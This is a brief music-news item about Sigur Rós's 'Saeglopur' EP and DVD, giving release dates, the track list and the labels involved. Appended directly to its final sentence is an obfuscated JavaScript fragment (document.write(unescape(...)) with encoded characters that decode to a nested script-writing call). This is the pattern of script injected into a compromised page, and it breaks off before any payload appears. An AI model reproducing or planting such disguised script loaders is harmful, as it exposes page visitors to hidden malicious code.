Icelandic faves Sigur Rós have announced an August 8 release for a two-part EP/DVD, which will be made available July 11 via iTunes before the discs are in stores.
The EP, Saeglopur, has one track from their last album, Takk, and three new songs along the same lines as tracks from the Baba Tiki Dido and Untitled EPs. According to a press release, this EP will be released "in partnership with the band's own Krunk label and Filter US Recordings" along with the label The Workers' Institute. In addition to the EP half, the rest of the package will contain a DVD with three "beautiful and engaging" videos for tracks "Saeglopur," "Glosoli," and "Hoppipolla."document.write(unescape("\074\123CR\111PT%3E\144oc%75\155%65n\04574.w%72\151te\050un\145\163ca\160e(%22
